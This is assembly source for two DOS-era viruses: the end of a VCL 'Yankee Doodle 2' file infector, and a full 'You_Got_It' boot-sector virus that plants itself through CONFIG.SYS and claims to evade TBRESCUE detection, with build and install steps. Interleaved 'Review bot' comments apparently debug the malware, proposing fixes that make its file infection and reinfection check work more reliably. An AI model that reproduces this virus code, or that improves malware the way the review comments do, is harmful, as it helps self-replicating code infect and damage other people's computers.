lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
lea dx,[di + start] ; DX points to start of virus
int 021h
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_hour proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,ch ; Copy hour into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_hour endp
data00 dw 262,6,262,6,293,6,329,6,262,6,329,6,293,6,196,6
dw 262,6,262,6,293,6,329,6,262,12,262,12
dw 262,6,262,6,293,6,329,6,349,6,329,6,293,6,262,6
dw 246,6,196,6,220,6,246,6,262,12,262,12
dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,6
dw 196,6,220,6,196,6,174,6,164,6,174,6,196,7
dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,7
dw 196,6,262,6,246,6,293,6,262,12,262,12
dw 0
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "[Yankee Doodle 2]",0
db "Nowhere Man, [NuKE] '92",0
finish label near
code ends
end main
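Review bot: In infect_file the read-only open (`mov ax,03D00h` … `int 021h` … `xchg bx,ax`) never tests the carry flag, so on a failed open the DOS error code left in AX is used as the file handle for the following read, seek and close; the read/write open after the attribute reset has the same gap. Since set_carry is already cleared to 0 at the top of the routine, a one-line guard after each open, `jc infection_done` (or a `jnc` around a near `jmp infection_done` if the displacement exceeds 127 bytes), makes the routine report failure instead of operating on a bogus handle. Note that the second open happens after the victim's attributes have already been cleared, so bailing out there still leaves them changed; restoring them on that path needs a few more lines.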
@@ -0,0 +1,335 @@
comment *
Designed by "Q" the Misanthrope
The "You_Got_It" virus needed to be made. Windows 95 has neglected the
floppy boot sector virus long enough. Windows 95 in it's 32 bit protected
mode has it's own floppy disk routines and doesn't use int 13 or int 40
anymore. When a floppy boot sector viruses infectes the hard disk of the
Windows 95 computer, it would flag a change in the MBR or DBR indicating
a possible virus attack (not good). The conclusion, don't hook int 13, hook
int 21. Problem is, when Windows 95 starts up, it starts in DOS mode then
changes to it's protected mode DOS so int 21 hooked in DOS mode isn't hooked
anymore. Many of the multipatrite virii will not infect once Windows 95
starts. If your boot sector virus can infect a program called in your
AUTOEXEC.BAT or your CONFIG.SYS then the virus would go resident. The
"You_Got_it" virus does this. It creates a randomly named file and adds
INSTALLH=\AKYTHSQW (name is random) to the CONFIG.SYS file. Now when
Windows 95's int 21 is called to change the default drive to A: then the
infection occures. Cool features: during boot up the virus moves into video
memory then into the High Memory Area (HMA) when dos loads high. The virus
tunnels int 21 and loads in the HMA with dos. Also the boot sector infection
will not attack the CONFIG.SYS multiple times.
P.S. This virus will not be detected by Thunderbytes TBRESCUE Boot sector
detector or CMOS virus protection.
tasm yougotit /m2
tlink yougotit
exe2bin yougotit.exe yougotit.com
format a:/q/u
debug yougotit.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 13e,2ff 100
rcx
1c2
w
q
copy yougotit.com c:\
edit c:\config.sys
device=\yougotit.com
altf
x
y
*
.286
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
top: jmp short jmp_install ;boot sector data
db 90h
db 'MSDOS5.0'
dw 512
db 1
dw 1
db 2
dw 224
dw 2880
db 0F0h
dw 9
dw 18
dw 2
org 003eh
com_install proc near
jmp short go_mem_res
com_install endp
jmp_install proc near ;floppy boot up
push cs ;for the retf to 0000:7c00
id equ $+01h
mov si,7c00h ;7c00 is the infection marker
lea bx,word ptr ds:[si] ;bx=7c00
push bx ;for the retf to 0000:7c00
cld
push cs
mov es,bx ;if monochrome copy code to
pop ds ;7c00:7c00
cmp word ptr ds:[0449h],07h ;check if monochrome
je monochrome
push 0b700h ;lets reside in video memory
pop es ;no need for that TOM
cmp word ptr es:[si+id-top],si
monochrome: push es ;check if already mem resident
mov di,si ;di=7c00
mov cx,offset previous_hook ;copy loop varable
push cx ;save it because we will copy
push si ;the code twice to b700:7c00
rep movsb ;and b700:7dfe
pop si
pop cx
call return_far ;goto b700 segment of code
rep movsb ;continue copy to b700:7dfe
mov si,1ah*04h ;only hook int 1a
je already_res ;if already resident don't
movsw ;hook again
movsw
mov word ptr ds:[si-04h],offset interrupt_1a+7e00h-02h
mov word ptr ds:[si-02h],cs ;hook int 1a
already_res: push ds ;read moved floppy boot sector
pop es
mov ax,0201h
jmp_install endp
set_cx_dx proc near
mov bp,word ptr ds:[bx+11h] ;code to point to last sector
mov cx,word ptr ds:[bx+16h] ;of the root directory of any
shr bp,04h ;floppy disk
shl cx,01h
add cx,bp
inc cx
mov dh,01h
sub cx,word ptr ds:[bx+18h]
int 13h ;read or write boot sector
return_far: retf ;return to 7c00:0000 or
set_cx_dx endp ;resident_21 routine
config_line db "C:\CONFIG.SYS",00 ;file to infect
install_name db "INSTALL=" ;what to add
file_name db "\" ;random file name goes here
db 00h
crlf equ $+07h
go_mem_res proc near ;CONFIG.SYS residency
mov ax,3501h ;get int 1 address for tunnel
int 21h
mov dx,offset interrupt_1-com_install+100h
mov ah,25h ;set int 1 for tunnel
push es
int 21h
pop ds ;ds:dx will be to set it back
push 00h ;es=0000h
pop es
pushf ;simulate interrupt stack
lea dx,word ptr ds:[bx]
push cs
push es ;return to cs:0000 is cd 20
int 01h ;set trap flag
db 26h ;es: override in to int table
dw 02effh,21h*04h ;jmp far ptr es:[0084]
go_mem_res endp
interrupt_1 proc near ;set trap flag, trace int 21
pusha ;save varables
push sp
pop bp ;get pointer
push ds
push es
lds si,dword ptr ss:[bp+10h];get next instruction address
cmp word ptr ds:[si+01h],02effh
jne go_back ;check if jmp far ?s:[????]
cmp word ptr ds:[si-02h],001cdh
org $-02h ;see if called from my int 01
int 01h
je toggle_tf
mov si,word ptr ds:[si+03h] ;get address segment of jmp
cmp byte ptr ds:[si+03h],0f0h
jb go_back ;see if in HMA area
mov bx,((tail-com_install+10h)SHR 4)*10h
mov di,0ffffh ;allocate HMA area for virus
mov ax,4a02h
int 2fh
inc di ;is HMA full
jz toggle_tf ;if so then just don't bother
push si ;move the virus to the HMA
cld
mov cx,previous_hook-com_install
mov si,0100h ;copy virus to HMA
rep movs byte ptr es:[di],cs:[si]
pop si ;now hook the int 21 chain
movsw
movsw
lea di,word ptr ds:[di-(offset vbuffer-resident_21)]
mov word ptr ds:[si-04h],di ;point to resident 21 code
mov word ptr ds:[si-02h],es
toggle_tf: xor byte ptr ss:[bp+15h],01h;toggle the trap flag
go_back: pop es
pop ds
popa
iret
interrupt_1 endp
interrupt_21 proc near ;hooked in after int 1a sees
pushf ;that dos loaded during boot
pusha
push ds
push es
push cs
pop ds
xor ah,4bh ;unload if a program starts
jz set_21_back
mov ax,3d42h ;open c:\config.sys
mov dx,offset config_line+7e00h-02h
int 18h ;really it is int 21
mov bx,5700h ;get date
xchg ax,bx
jc retry_later ;unable to open c:\config.sys
int 18h
or cl,cl ;is c:\config.sys infected
jz close_it
pusha ;save file date
mov ah,5ah ;create random file
mov cx,0005h
mov dx,offset file_name+7e00h-02h
int 18h
mov dx,offset com_install+7c00h
mov bh,40h ;write virus code into file
xchg ax,bx
mov ch,02h
int 18h
mov ah,3eh ;close it
int 18h
popa ;date and handle c:\config.sys
inc ax ;set date
pusha ;save it for later
mov ax,4202h ;go to end of c:\config.sys
cwd
push dx
pop cx
int 18h
mov ah,40h ;write INSTALL=\ line
mov word ptr ds:[crlf+7e00h-02h],0a0dh
mov cl,low(crlf-install_name+02h)
mov dx,offset install_name+7e00h-02h
int 18h ;be sure to cr lf terminate it
popa ;get file date
shr cl,cl ;blitz seconds and more
int 18h
close_it: mov ah,3eh ;close c:\config.sys
int 18h
set_21_back: lds dx,dword ptr ds:[previous_hook+7c00h]
jmp short set_int_21 ;unhook it 21
retry_later: jmp short jmp_pop_it
interrupt_21 endp
interrupt_1a proc near ;hooked at boot and waits for
pushf ;dos to load
pusha
mov ax,1200h ;dos loaded
push ds
push es
cwd
int 2fh
inc al
jnz jmp_pop_it ;and unhook int 1a
mov ds,dx ;if loaded then hook int 21
mov si,21h*04h ;sorry for all the complexity
mov di,offset previous_hook+7c00h
les bx,dword ptr cs:[previous_hook+7e00h-02h]
mov ds:[si-((21h-1ah)*04h)+02h],es
mov ds:[si-((21h-1ah)*04h)],bx
les bx,dword ptr ds:[si]
mov ds:[si-((21h-18h)*04h)+02h],es
push cs ;also save int 21 into int 18
cld
mov ds:[si-((21h-18h)*04h)],bx
pop es
movsw
movsw
mov dx,offset interrupt_21+7c00h
push cs ;set int 21
pop ds
set_int_21: mov ax,2521h
int 18h
jmp_pop_it: jmp short pop_it
interrupt_1a endp
org 001b4h
resident_21 proc near ;memory resident int 21
pushf ;called when loaded from
pusha ;config.sys
push ds
push es
cmp ah,0eh ;is it set drive
jne pop_it
or dl,dl ;drive A:
jnz pop_it
cwd ;set varables to read sector
call next_line
next_line: pop bx
add bx,offset vbuffer-next_line
push cs
mov cx,0001h
pop es
push cs
mov ax,0201h ;try reading the boot sector
pop ds
int 13h
jc pop_it ;if not don't infect
cmp byte ptr ds:[bx+id-top+01h],7ch
je pop_it ;check if infected
mov ax,0301h ;move and write boot sector
pusha ;save for later
push cs ;for far retf
call set_cx_dx
cld
mov cx,previous_hook-com_install
lea si,word ptr ds:[bx-offset (vbuffer-com_install)]
lea di,word ptr ds:[bx+com_install-top]
rep movsb
mov word ptr ds:[bx],0000h
org $-02h
jmp $(jmp_install-top) ;place initial jmp at front
popa
int 13h ;write it
pop_it: pop es
pop ds
popa
popf
resident_21 endp
org 001fdh
far_jmp proc near
db 0eah ;jmp to old int 1a or boot
previous_hook: label double ;up int 21 or resident int 21
far_jmp endp
boot_signature dw 0aa55h ;guess what
org $+02h
vbuffer label byte ;buffer to read boot sector
org $+0202h ;the end of the code
tail label byte
qseg ends
end
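Review bot: `shr cl,cl ;blitz seconds and more` in interrupt_21 does not reliably zero CL, which is the infection marker the routine later checks with `or cl,cl` / `jz close_it`: the file is assembled `.286`, where the shift count is masked to 5 bits, so the low byte of the file time is fully cleared only when `cl AND 1Fh` is 8 or more (a low byte of 0E0h, for instance, shifts by 0 and stays 0E0h). When that happens the CONFIG.SYS time is written back with a non-zero marker and the next boot infects it again, contrary to the header comment that CONFIG.SYS is not attacked multiple times. The intended instruction is a plain `xor cl,cl`, with the comment `;zero seconds field = infection marker`.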